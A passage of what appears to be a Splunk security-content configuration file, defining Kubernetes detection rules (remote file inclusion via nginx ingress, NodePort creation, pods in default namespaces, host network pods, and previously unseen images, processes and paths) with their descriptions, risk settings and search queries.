["Exploitation"], "mitre_attack": ["T1212"], "nist": ["DE.CM"]} schedule_window = auto action.notable = 1 action.notable.param.nes_fields = user,dest action.notable.param.rule_description = This search uses the Kubernetes logs from a nginx ingress controller to detect remote file inclusion attacks. action.notable.param.rule_title = Kubernetes Nginx Ingress RFI action.notable.param.security_domain = network action.notable.param.severity = high alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = `kubernetes_container_controller` | rex field=_raw "^(?\S+)\s+-\s+-\s+\[(?[^\]]*)\]\s\"(?[^\"]*)\"\s(?\S*)\s(?\S*)\s\"(?[^\"]*)\"\s\"(?[^\"]*)\"\s(?\S*)\s(?\S*)\s\[(?[^\]]*)\]\s\[(?[^\]]*)\]\s(?\S*)\s(?\S*)\s(?\S*)\s(?\S*)\s(?\S*)" | rex field=request "^(?\S+)?\s(?\S+)\s" | rex field=url "(?\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3})" | search dest_ip=* | rename remote_addr AS src_ip, upstream_status as status, proxy_upstream_name as proxy | eval phase="operate" | eval severity="medium" | stats count min(_time) as firstTime max(_time) as lastTime by src_ip, dest_ip status, url, http_method, host, http_user_agent, proxy, phase, severity | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `kubernetes_nginx_ingress_rfi_filter` [ESCU - Kubernetes Node Port Creation - Rule] action.escu = 0 action.escu.enabled = 1 description = The following analytic detects the creation of a Kubernetes node port service, an action that exposes a service to the external network. It identifies this behavior by monitoring Kubernetes Audit logs for creation of a Node Port service. This behavior is worth identifying for a SOC as it could potentially allow an attacker to access internal services, posing a significant threat to the integrity and security of the Kubernetes infrastructure. The impact of such an attack could be severe, leading to data breaches, service disruptions, or unauthorized access to sensitive information. action.escu.mappings = {"cis20": ["CIS 13"], "kill_chain_phases": ["Installation"], "mitre_attack": ["T1204"], "nist": ["DE.AE"]} action.escu.data_models = [] action.escu.eli5 = The following analytic detects the creation of a Kubernetes node port service, an action that exposes a service to the external network. It identifies this behavior by monitoring Kubernetes Audit logs for creation of a Node Port service. This behavior is worth identifying for a SOC as it could potentially allow an attacker to access internal services, posing a significant threat to the integrity and security of the Kubernetes infrastructure. The impact of such an attack could be severe, leading to data breaches, service disruptions, or unauthorized access to sensitive information. action.escu.how_to_implement = The detection is based on data that originates from Kubernetes Audit logs. Ensure that audit logging is enabled in your Kubernetes cluster. Kubernetes audit logs provide a record of the requests made to the Kubernetes API server, which is crucial for monitoring and detecting suspicious activities. Configure the audit policy in Kubernetes to determine what kind of activities are logged. This is done by creating an Audit Policy and providing it to the API server. Use the Splunk OpenTelemetry Collector for Kubernetes to collect the logs. This doc will describe how to collect the audit log file https://github.com/signalfx/splunk-otel-collector-chart/blob/main/docs/migration-from-sck.md. action.escu.known_false_positives = unknown action.escu.creation_date = 2023-12-13 action.escu.modification_date = 2023-12-13 action.escu.confidence = high action.escu.full_search_name = ESCU - Kubernetes Node Port Creation - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = ["Kubernetes"] action.escu.analytic_story = ["Kubernetes Security"] action.risk = 1 action.risk.param._risk_message = Kubernetes node port creation from user $user$ action.risk.param._risk = [{"risk_object_field": "user", "risk_object_type": "other", "risk_score": 49}, {"threat_object_field": "src_ip", "threat_object_type": "ip_address"}] action.risk.param._risk_score = 0 action.risk.param.verbose = 0 cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - Kubernetes Node Port Creation - Rule action.correlationsearch.annotations = {"analytic_story": ["Kubernetes Security"], "cis20": ["CIS 13"], "confidence": 70, "impact": 70, "kill_chain_phases": ["Installation"], "mitre_attack": ["T1204"], "nist": ["DE.AE"]} schedule_window = auto alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = `kube_audit` "objectRef.resource"=services verb=create requestObject.spec.type=NodePort | fillnull | stats count values(user.groups{}) as user_groups by kind objectRef.name objectRef.namespace objectRef.resource requestObject.kind requestObject.spec.type responseStatus.code sourceIPs{} stage user.username userAgent verb | rename sourceIPs{} as src_ip, user.username as user | `kubernetes_node_port_creation_filter` [ESCU - Kubernetes Pod Created in Default Namespace - Rule] action.escu = 0 action.escu.enabled = 1 description = The following analytic detects the creation of pods in the default, kube-system, or kube-public namespaces. It identifies this behavior by monitoring Kubernetes audit logs for pod creation events in these namespaces. This behavior is worth identifying for a SOC as it may indicate an attacker attempting to hide their presence or evade defenses. Only administrators should typically create pods in the kube-system namespace, and the default and kube-public namespaces should not be used in production. The impact of the attack could be significant, as it may indicate a successful cluster breach and ongoing malicious activity. action.escu.mappings = {"cis20": ["CIS 13"], "kill_chain_phases": ["Installation"], "mitre_attack": ["T1204"], "nist": ["DE.AE"]} action.escu.data_models = [] action.escu.eli5 = The following analytic detects the creation of pods in the default, kube-system, or kube-public namespaces. It identifies this behavior by monitoring Kubernetes audit logs for pod creation events in these namespaces. This behavior is worth identifying for a SOC as it may indicate an attacker attempting to hide their presence or evade defenses. Only administrators should typically create pods in the kube-system namespace, and the default and kube-public namespaces should not be used in production. The impact of the attack could be significant, as it may indicate a successful cluster breach and ongoing malicious activity. action.escu.how_to_implement = The detection is based on data that originates from Kubernetes Audit logs. Ensure that audit logging is enabled in your Kubernetes cluster. Kubernetes audit logs provide a record of the requests made to the Kubernetes API server, which is crucial for monitoring and detecting suspicious activities. Configure the audit policy in Kubernetes to determine what kind of activities are logged. This is done by creating an Audit Policy and providing it to the API server. Use the Splunk OpenTelemetry Collector for Kubernetes to collect the logs. This doc will describe how to collect the audit log file https://github.com/signalfx/splunk-otel-collector-chart/blob/main/docs/migration-from-sck.md. action.escu.known_false_positives = unknown action.escu.creation_date = 2023-12-19 action.escu.modification_date = 2023-12-19 action.escu.confidence = high action.escu.full_search_name = ESCU - Kubernetes Pod Created in Default Namespace - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = ["Kubernetes"] action.escu.analytic_story = ["Kubernetes Security"] action.risk = 1 action.risk.param._risk_message = Kubernetes Pod Created in Default Namespace by $user$ action.risk.param._risk = [{"risk_object_field": "user", "risk_object_type": "other", "risk_score": 49}, {"threat_object_field": "src_ip", "threat_object_type": "ip_address"}] action.risk.param._risk_score = 0 action.risk.param.verbose = 0 cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - Kubernetes Pod Created in Default Namespace - Rule action.correlationsearch.annotations = {"analytic_story": ["Kubernetes Security"], "cis20": ["CIS 13"], "confidence": 70, "impact": 70, "kill_chain_phases": ["Installation"], "mitre_attack": ["T1204"], "nist": ["DE.AE"]} schedule_window = auto alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = `kube_audit` objectRef.resource=pods verb=create objectRef.namespace IN ("default", "kube-system", "kube-public") | fillnull | stats count by objectRef.name objectRef.namespace objectRef.resource requestReceivedTimestamp requestURI responseStatus.code sourceIPs{} stage user.groups{} user.uid user.username userAgent verb | rename sourceIPs{} as src_ip, user.username as user | `kubernetes_pod_created_in_default_namespace_filter` [ESCU - Kubernetes Pod With Host Network Attachment - Rule] action.escu = 0 action.escu.enabled = 1 description = The following analytic detects the creation of a pod with host network attachment in Kubernetes. It identifies this behavior by monitoring Kubernetes Audit logs for the creation or update of pods with host network configuration. This behavior is worth identifying for a SOC as it could potentially allow an attacker to listen to all network traffic on the node and other compute on the network namespace, capturing secrets passed in arguments or connections to escalate their privileges. The impact of such an attack could be severe, leading to unauthorized access to sensitive information, data breaches, and service disruptions. action.escu.mappings = {"cis20": ["CIS 13"], "kill_chain_phases": ["Installation"], "mitre_attack": ["T1204"], "nist": ["DE.AE"]} action.escu.data_models = [] action.escu.eli5 = The following analytic detects the creation of a pod with host network attachment in Kubernetes. It identifies this behavior by monitoring Kubernetes Audit logs for the creation or update of pods with host network configuration. This behavior is worth identifying for a SOC as it could potentially allow an attacker to listen to all network traffic on the node and other compute on the network namespace, capturing secrets passed in arguments or connections to escalate their privileges. The impact of such an attack could be severe, leading to unauthorized access to sensitive information, data breaches, and service disruptions. action.escu.how_to_implement = The detection is based on data that originates from Kubernetes Audit logs. Ensure that audit logging is enabled in your Kubernetes cluster. Kubernetes audit logs provide a record of the requests made to the Kubernetes API server, which is crucial for monitoring and detecting suspicious activities. Configure the audit policy in Kubernetes to determine what kind of activities are logged. This is done by creating an Audit Policy and providing it to the API server. Use the Splunk OpenTelemetry Collector for Kubernetes to collect the logs. This doc will describe how to collect the audit log file https://github.com/signalfx/splunk-otel-collector-chart/blob/main/docs/migration-from-sck.md. action.escu.known_false_positives = unknown action.escu.creation_date = 2023-12-14 action.escu.modification_date = 2023-12-14 action.escu.confidence = high action.escu.full_search_name = ESCU - Kubernetes Pod With Host Network Attachment - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = ["Kubernetes"] action.escu.analytic_story = ["Kubernetes Security"] action.risk = 1 action.risk.param._risk_message = Kubernetes pod with host network attachment from user $user$. action.risk.param._risk = [{"risk_object_field": "user", "risk_object_type": "other", "risk_score": 49}, {"threat_object_field": "src_ip", "threat_object_type": "ip_address"}] action.risk.param._risk_score = 0 action.risk.param.verbose = 0 cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - Kubernetes Pod With Host Network Attachment - Rule action.correlationsearch.annotations = {"analytic_story": ["Kubernetes Security"], "cis20": ["CIS 13"], "confidence": 70, "impact": 70, "kill_chain_phases": ["Installation"], "mitre_attack": ["T1204"], "nist": ["DE.AE"]} schedule_window = auto alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = `kube_audit` objectRef.resource=pods verb=create OR verb=update requestObject.metadata.annotations.kubectl.kubernetes.io/last-applied-configuration=*\"hostNetwork\":true* | fillnull | stats count values(user.groups{}) as user_groups by kind objectRef.name objectRef.namespace objectRef.resource requestObject.kind responseStatus.code sourceIPs{} stage user.username userAgent verb requestObject.metadata.annotations.kubectl.kubernetes.io/last-applied-configuration | rename sourceIPs{} as src_ip, user.username as user | `kubernetes_pod_with_host_network_attachment_filter` [ESCU - Kubernetes Previously Unseen Container Image Name - Rule] action.escu = 0 action.escu.enabled = 1 description = **WARNING**, this detection is marked **EXPERIMENTAL** by the Splunk Threat Research Team. This means that the detection has been manually tested but we do not have the associated attack data to perform automated testing or cannot share this attack dataset due to its sensitive nature. If you have any questions feel free to email us at: research@splunk.com. The following analytic identifies containerised workloads that have been created using a previously unseen image. This detection leverages process metrics harvested using an OTEL collector and kubernetes cluster receiver, and is pulled from Splunk Observability cloud using the Splunk Infrastructure Monitoring Add-on. (https://splunkbase.splunk.com/app/5247). This detection uses the k8s.container.ready metric to compare the container image names seen in the last 1 hour with those seen in the 30 days prior to those 1 hour, and alerts if a new container image is detected. When a container in a Kubernetes cluster created using a previously unseen image it raises potential security risks and unknown variables. Unfamiliar container images could contain vulnerabilities, malware, or misconfigurations that pose threats to the cluster's integrity and the applications it hosts. The absence of prior knowledge about the image makes it difficult to assess its trustworthiness, track its lineage, or verify its compliance with security policies. The potential security impact of a container created using a compromised image is significant. Compromised containers can potentially introduce malware, backdoors, or other malicious code into the containerized application, leading to data breaches, service disruptions, and unauthorized access within the Kubernetes cluster. A compromised image can serve as a foothold for lateral movement and privilege escalation, potentially compromising other containers, pods, or nodes in the cluster. Additionally, it may enable the actor to exfiltrate sensitive data, manipulate configurations, or execute arbitrary code, posing risks to the confidentiality, availability, and integrity of applications and data hosted within the cluster action.escu.mappings = {"cis20": ["CIS 13"], "kill_chain_phases": ["Installation"], "mitre_attack": ["T1204"], "nist": ["DE.AE"]} action.escu.data_models = [] action.escu.eli5 = The following analytic identifies containerised workloads that have been created using a previously unseen image. This detection leverages process metrics harvested using an OTEL collector and kubernetes cluster receiver, and is pulled from Splunk Observability cloud using the Splunk Infrastructure Monitoring Add-on. (https://splunkbase.splunk.com/app/5247). This detection uses the k8s.container.ready metric to compare the container image names seen in the last 1 hour with those seen in the 30 days prior to those 1 hour, and alerts if a new container image is detected. When a container in a Kubernetes cluster created using a previously unseen image it raises potential security risks and unknown variables. Unfamiliar container images could contain vulnerabilities, malware, or misconfigurations that pose threats to the cluster's integrity and the applications it hosts. The absence of prior knowledge about the image makes it difficult to assess its trustworthiness, track its lineage, or verify its compliance with security policies. The potential security impact of a container created using a compromised image is significant. Compromised containers can potentially introduce malware, backdoors, or other malicious code into the containerized application, leading to data breaches, service disruptions, and unauthorized access within the Kubernetes cluster. A compromised image can serve as a foothold for lateral movement and privilege escalation, potentially compromising other containers, pods, or nodes in the cluster. Additionally, it may enable the actor to exfiltrate sensitive data, manipulate configurations, or execute arbitrary code, posing risks to the confidentiality, availability, and integrity of applications and data hosted within the cluster action.escu.how_to_implement = To implement this detection, follow these steps: \ * Deploy the OpenTelemetry Collector (OTEL) to your Kubernetes cluster.\ * Enable the hostmetrics/process receiver in the OTEL configuration.\ * Ensure that the process metrics, specifically Process.cpu.utilization and process.memory.utilization, are enabled.\ * Install the Splunk Infrastructure Monitoring (SIM) add-on. (ref: https://splunkbase.splunk.com/app/5247)\ * Configure the SIM add-on with your Observability Cloud Organization ID and Access Token.\ * Set up the SIM modular input to ingest Process Metrics. Name this input "sim_process_metrics_to_metrics_index".\ * In the SIM configuration, set the Organization ID to your Observability Cloud Organization ID.\ * Set the Signal Flow Program to the following: data('process.threads').publish(label='A'); data('process.cpu.utilization').publish(label='B'); data('process.cpu.time').publish(label='C'); data('process.disk.io').publish(label='D'); data('process.memory.usage').publish(label='E'); data('process.memory.virtual').publish(label='F'); data('process.memory.utilization').publish(label='G'); data('process.cpu.utilization').publish(label='H'); data('process.disk.operations').publish(label='I'); data('process.handles').publish(label='J'); data('process.threads').publish(label='K')\ * Set the Metric Resolution to 10000.\ * Leave all other settings at their default values.\ * Run the Search Baseline Of Kubernetes Container Network IO Ratio action.escu.known_false_positives = unknown action.escu.creation_date = 2023-12-18 action.escu.modification_date = 2023-12-18 action.escu.confidence = high action.escu.full_search_name = ESCU - Kubernetes Previously Unseen Container Image Name - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = ["Kubernetes"] action.escu.analytic_story = ["Abnormal Kubernetes Behavior using Splunk Infrastructure Monitoring"] action.risk = 1 action.risk.param._risk_message = Kubernetes Previously Unseen Container Image Name on host $host$ action.risk.param._risk = [{"risk_object_field": "host", "risk_object_type": "other", "risk_score": 25}] action.risk.param._risk_score = 0 action.risk.param.verbose = 0 cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - Experimental - Kubernetes Previously Unseen Container Image Name - Rule action.correlationsearch.annotations = {"analytic_story": ["Abnormal Kubernetes Behavior using Splunk Infrastructure Monitoring"], "cis20": ["CIS 13"], "confidence": 50, "impact": 50, "kill_chain_phases": ["Installation"], "mitre_attack": ["T1204"], "nist": ["DE.AE"]} schedule_window = auto alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = | mstats count(k8s.container.ready) as k8s.container.ready_count where `kubernetes_metrics` AND earliest=-24h by host.name k8s.cluster.name k8s.node.name container.image.name | eval current="True" | append [mstats count(k8s.container.ready) as k8s.container.ready_count where `kubernetes_metrics` AND earliest=-30d latest=-1h by host.name k8s.cluster.name k8s.node.name container.image.name | eval current="false" ] | stats values(current) as current by host.name k8s.cluster.name k8s.node.name container.image.name | search current="true" AND current!="false" | rename host.name as host | `kubernetes_previously_unseen_container_image_name_filter` [ESCU - Kubernetes Previously Unseen Process - Rule] action.escu = 0 action.escu.enabled = 1 description = **WARNING**, this detection is marked **EXPERIMENTAL** by the Splunk Threat Research Team. This means that the detection has been manually tested but we do not have the associated attack data to perform automated testing or cannot share this attack dataset due to its sensitive nature. If you have any questions feel free to email us at: research@splunk.com. This analytic detects newly seen process within the Kubernetes scope on a master or worker node. This detection leverages process metrics harvested using an OTEL collector and hostmetrics receiever, and is pulled from Splunk Observability cloud using the Splunk Infrastructure Monitoring Add-on. (https://splunkbase.splunk.com/app/5247). This detection compares the processes seen for each node over the previous 1 hour with those over the previous 30 days up until the previous 1 hour. The specific metric used by this detection is process.memory.utilization. Newly seen processes on a Kubernetes worker node are concerning as they may represent security risks and anomalies that could be related to unauthorized activity. New processes may be introduced in an attempt to compromise the node or gain control of the Kubernetes cluster. By detecting these processes, they can be investigated, and correlated with other anomalous activity for that host. Newly seen processes may be part of an attacker's strategy to compromise the node, gain unauthorized access, and subsequently extend their control to the entire Kubernetes cluster. These processes could facilitate activities such as data exfiltration, privilege escalation, denial-of-service attacks, or the introduction of malware and backdoors, putting sensitive data, applications, and the entire infrastructure at risk. The consequences may include data breaches, service disruptions, financial losses, and reputational damage, underscoring the need to identify anomalous process and associate them with any concurrent risk activity. action.escu.mappings = {"cis20": ["CIS 13"], "kill_chain_phases": ["Installation"], "mitre_attack": ["T1204"], "nist": ["DE.AE"]} action.escu.data_models = [] action.escu.eli5 = This analytic detects newly seen process within the Kubernetes scope on a master or worker node. This detection leverages process metrics harvested using an OTEL collector and hostmetrics receiever, and is pulled from Splunk Observability cloud using the Splunk Infrastructure Monitoring Add-on. (https://splunkbase.splunk.com/app/5247). This detection compares the processes seen for each node over the previous 1 hour with those over the previous 30 days up until the previous 1 hour. The specific metric used by this detection is process.memory.utilization. Newly seen processes on a Kubernetes worker node are concerning as they may represent security risks and anomalies that could be related to unauthorized activity. New processes may be introduced in an attempt to compromise the node or gain control of the Kubernetes cluster. By detecting these processes, they can be investigated, and correlated with other anomalous activity for that host. Newly seen processes may be part of an attacker's strategy to compromise the node, gain unauthorized access, and subsequently extend their control to the entire Kubernetes cluster. These processes could facilitate activities such as data exfiltration, privilege escalation, denial-of-service attacks, or the introduction of malware and backdoors, putting sensitive data, applications, and the entire infrastructure at risk. The consequences may include data breaches, service disruptions, financial losses, and reputational damage, underscoring the need to identify anomalous process and associate them with any concurrent risk activity. action.escu.how_to_implement = To implement this detection, follow these steps: \ * Deploy the OpenTelemetry Collector (OTEL) to your Kubernetes cluster.\ * Enable the hostmetrics/process receiver in the OTEL configuration.\ * Ensure that the process metrics, specifically Process.cpu.utilization and process.memory.utilization, are enabled.\ * Install the Splunk Infrastructure Monitoring (SIM) add-on. (ref: https://splunkbase.splunk.com/app/5247)\ * Configure the SIM add-on with your Observability Cloud Organization ID and Access Token.\ * Set up the SIM modular input to ingest Process Metrics. Name this input "sim_process_metrics_to_metrics_index".\ * In the SIM configuration, set the Organization ID to your Observability Cloud Organization ID.\ * Set the Signal Flow Program to the following: data('process.threads').publish(label='A'); data('process.cpu.utilization').publish(label='B'); data('process.cpu.time').publish(label='C'); data('process.disk.io').publish(label='D'); data('process.memory.usage').publish(label='E'); data('process.memory.virtual').publish(label='F'); data('process.memory.utilization').publish(label='G'); data('process.cpu.utilization').publish(label='H'); data('process.disk.operations').publish(label='I'); data('process.handles').publish(label='J'); data('process.threads').publish(label='K')\ * Set the Metric Resolution to 10000.\ * Leave all other settings at their default values.\ * Run the Search Baseline Of Kubernetes Container Network IO Ratio action.escu.known_false_positives = unknown action.escu.creation_date = 2023-12-18 action.escu.modification_date = 2023-12-18 action.escu.confidence = high action.escu.full_search_name = ESCU - Kubernetes Previously Unseen Process - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = ["Kubernetes"] action.escu.analytic_story = ["Abnormal Kubernetes Behavior using Splunk Infrastructure Monitoring"] action.risk = 1 action.risk.param._risk_message = Kubernetes Previously Unseen Process on host $host$ action.risk.param._risk = [{"risk_object_field": "host", "risk_object_type": "other", "risk_score": 25}] action.risk.param._risk_score = 0 action.risk.param.verbose = 0 cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - Experimental - Kubernetes Previously Unseen Process - Rule action.correlationsearch.annotations = {"analytic_story": ["Abnormal Kubernetes Behavior using Splunk Infrastructure Monitoring"], "cis20": ["CIS 13"], "confidence": 50, "impact": 50, "kill_chain_phases": ["Installation"], "mitre_attack": ["T1204"], "nist": ["DE.AE"]} schedule_window = auto alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = | mstats count(process.memory.utilization) as process.memory.utilization_count where `kubernetes_metrics` AND earliest=-1h by host.name k8s.cluster.name k8s.node.name process.executable.name | eval current="True" | append [mstats count(process.memory.utilization) as process.memory.utilization_count where `kubernetes_metrics` AND earliest=-30d latest=-1h by host.name k8s.cluster.name k8s.node.name process.executable.name ] | stats count values(current) as current by host.name k8s.cluster.name k8s.node.name process.executable.name | where count=1 and current="True" | rename host.name as host | `kubernetes_previously_unseen_process_filter` [ESCU - Kubernetes Process Running From New Path - Rule] action.escu = 0 action.escu.enabled = 1 description = **WARNING**, this detection is marked **EXPERIMENTAL** by the Splunk Threat Research Team. This means that the detection has been manually tested but we do not have the associated attack data to perform automated testing or cannot share this attack dataset due to its sensitive nature. If you have any questions feel free to email us at: research@splunk.com. This analytic detects processes running within the same scope as Kubernetes that have been run from a newly seen path. This detection leverages process metrics harvested using an OTEL collector and hostmetrics receiever, and is pulled from Splunk Observability cloud using the Splunk Infrastructure Monitoring Add-on. (https://splunkbase.splunk.com/app/5247). This detection compares the processes seen for each node over the previous 1 hour with those over the previous 30 days up until the previous 1 hour, and alerts if the path for that process was not seen over the previous 30 days. The specific metric used by this detection is process.memory.utilization. Processes running from a newly seen path can signify potential security risks and anomalies. A process executing from an unfamiliar file path may indicate unauthorized changes to the file system, a compromised node, or the introduction of malicious software. If the presence of a process running from a newly seen file path on a Kubernetes node indicates malicious activity, the security implications could be severe. It suggests that an attacker has potentially compromised the node, allowing them to execute unauthorized processes and potentially gain control over critical resources. This could lead to further exploitation, data exfiltration, privilege escalation, or the introduction of malware and backdoors within the Kubernetes cluster. action.escu.mappings = {"cis20": ["CIS 13"], "kill_chain_phases": ["Installation"], "mitre_attack": ["T1204"], "nist": ["DE.AE"]} action.escu.data_models = [] action.escu.eli5 = This analytic detects processes running within the same scope as Kubernetes that have been run from a newly seen path. This detection leverages process metrics harvested using an OTEL collector and hostmetrics receiever, and is pulled from Splunk Observability cloud using the Splunk Infrastructure Monitoring Add-on. (https://splunkbase.splunk.com/app/5247). This detection compares the processes seen for each node over the previous 1 hour with those over the previous 30 days up until the previous 1 hour, and alerts if the path for that process was not seen over the previous 30 days. The specific metric used by this detection is process.memory.utilization. Processes running from a newly seen path can signify potential security risks and anomalies. A process executing from an unfamiliar file path may indicate unauthorized changes to the file system, a compromised node, or the introduction of malicious software. If the presence of a process running from a newly seen file path on a Kubernetes node indicates malicious activity, the security implications could be severe. It suggests that an attacker has potentially compromised the node, allowing them to execute unauthorized processes and potentially gain control over critical resources. This could lead to further exploitation, data exfiltration, privilege escalation, or the introduction of malware and backdoors within the Kubernetes cluster. action.escu.how_to_implement = To implement this detection, follow these steps: \ * Deploy the OpenTelemetry Collector (OTEL) to your Kubernetes cluster.\ * Enable the hostmetrics/process receiver in the OTEL configuration.\ * Ensure that the process metrics, specifically Process.cpu.utilization and process.memory.utilization, are enabled.\ * Install the Splunk Infrastructure Monitoring (SIM) add-on. (ref: https://splunkbase.splunk.com/app/5247)\ * Configure the SIM add-on with your Observability Cloud Organization ID and Access Token.\ * Set up the SIM modular input to ingest Process Metrics. Name this input "sim_process_metrics_to_metrics_index".\ * In the SIM configuration, set the Organization ID to your Observability Cloud Organization ID.\ * Set the Signal Flow Program to the following: data('process.threads').publish(label='A'); data('process.cpu.utilization').publish(label='B'); data('process.cpu.time').publish(label='C'); data('process.disk.io').publish(label='D'); data('process.memory.usage').publish(label='E'); data('process.memory.virtual').publish(label='F'); data('process.memory.utilization').publish(label='G'); data('process.cpu.utilization').publish(label='H'); data('process.disk.operations').publish(label='I'); data('process.handles').publish(label='J'); data('process.threads').publish(label='K')\ * Set the Metric Resolution to 10000.\ * Leave all other settings at their default values.\ * Run the Search Baseline Of Kubernetes Container Network IO Ratio action.escu.known_false_positives = unknown action.escu.creation_date = 2023-12-18 action.escu.modification_date = 2023-12-18 action.escu.confidence = high action.escu.full_search_name = ESCU - Kubernetes Process Running From New Path - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = ["Kubernetes"] action.escu.analytic_story = ["Abnormal Kubernetes Behavior using Splunk Infrastructure Monitoring"] action.risk = 1 action.risk.param._risk_message = Kubernetes Process Running From New Path on host $host$ action.risk.param._risk = [{"risk_object_field": "host", "risk_object_type": "other", "risk_score": 25}] action.risk.param._risk_score = 0 action.risk.param.verbose = 0 cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - Experimental - Kubernetes Process Running From New Path - Rule action.correlationsearch.annotations = {"analytic_story": ["Abnormal Kubernetes Behavior using Splunk Infrastructure Monitoring"], "cis20": ["CIS 13"], "confidence": 50, "impact": 50, "kill_chain_phases": ["Installation"], "mitre_attack": ["T1204"], "nist": ["DE.AE"]} schedule_window = auto alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = | mstats count(process.memory.utilization) as process.memory.utilization_count where `kubernetes_metrics` AND earliest=-1h by host.name k8s.cluster.name k8s.node.name process.pid process.executable.path process.executable.name | eval current="True" | append [ mstats count(process.memory.utilization) as process.memory.utilization_count where `kubernetes_metrics` AND earliest=-30d latest=-1h by host.name k8s.cluster.name k8s.node.name process.pid process.executable.path process.executable.name ] | stats count values(current) as current by host.name k8s.cluster.name k8s.node.name process.pid process.executable.name process.executable.path | where count=1 and current="True" | rename host.name as host | `kubernetes_process_running_from_new_path_filter` [ESCU - Kubernetes Process with Anomalous Resource Utilisation - Rule] action.escu = 0 action.escu.enabled = 1 description = **WARNING**, this detection is marked **EXPERIMENTAL** by the Splunk Threat Research Team. This means that the detection has been manually tested but we do not have the associated attack data to perform automated testing or cannot share this attack dataset due to its sensitive nature. If you have any questions feel free to email us at: research@splunk.com. This analytic identifies high resource utilization anomalies in Kubernetes processes. It uses process metrics from an OTEL collector and hostmetrics receiver, fetched from Splunk Observability cloud via the Splunk Infrastructure Monitoring Add-on. The detection uses a lookup table with average and standard deviation values for various process metrics to identify anomalies. High resource utilization can indicate security threats or operational issues, such as cryptojacking, unauthorized data exfiltration, or compromised containers. These anomalies can disrupt services, exhaust resources, increase costs, and allow attackers to evade detection or maintain access. action.escu.mappings = {"cis20": ["CIS 13"], "kill_chain_phases": ["Installation"], "mitre_attack": ["T1204"], "nist": ["DE.AE"]} action.escu.data_models = [] action.escu.eli5 = This analytic identifies high resource utilization anomalies in Kubernetes processes. It uses process metrics from an OTEL collector and hostmetrics receiver, fetched from Splunk Observability cloud via the Splunk Infrastructure Monitoring Add-on. The detection uses a lookup table with average and standard deviation values for various process metrics to identify anomalies. High resource utilization can indicate security threats or operational issues, such as cryptojacking, unauthorized data exfiltration, or compromised containers. These anomalies can disrupt services, exhaust resources, increase costs, and allow attackers to evade detection or maintain access. action.escu.how_to_implement = To implement this detection, follow these steps: \ * Deploy the OpenTelemetry Collector (OTEL) to your Kubernetes cluster.\ * Enable the hostmetrics/process receiver in the OTEL configuration.\ * Ensure that the process metrics, specifically Process.cpu.utilization and process.memory.utilization, are enabled.\ * Install the Splunk Infrastructure Monitoring (SIM) add-on. (ref: https://splunkbase.splunk.com/app/5247)\ * Configure the SIM add-on with your Observability Cloud Organization ID and Access Token.\ * Set up the SIM modular input to ingest Process Metrics. Name this input "sim_process_metrics_to_metrics_index".\ * In the SIM configuration, set the Organization ID to your Observability Cloud Organization ID.\ * Set the Signal Flow Program to the following: data('process.threads').publish(label='A'); data('process.cpu.utilization').publish(label='B'); data('process.cpu.time').publish(label='C'); data('process.disk.io').publish(label='D'); data('process.memory.usage').publish(label='E'); data('process.memory.virtual').publish(label='F'); data('process.memory.utilization').publish(label='G'); data('process.cpu.utilization').publish(label='H'); data('process.disk.operations').publish(label='I'); data('process.handles').publish(label='J'); data('process.threads').publish(label='K')\ * Set the Metric Resolution to 10000.\ * Leave all other settings at their default values.\ * Run the Search Baseline Of Kubernetes Container Network IO Ratio action.escu.known_false_positives = unknown action.escu.creation_date = 2023-12-18 action.escu.modification_date = 2023-12-18 action.escu.confidence = high action.escu.full_search_name = ESCU - Kubernetes Process with Anomalous Resource Utilisation - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = ["Kubernetes"] action.escu.analytic_story = ["Abnormal Kubernetes Behavior using Splunk Infrastructure Monitoring"] action.risk = 1 action.risk.param._risk_message = Kubernetes Process with Anomalous Resource Utilisation on host $host$ action.risk.param._risk = [{"risk_object_field": 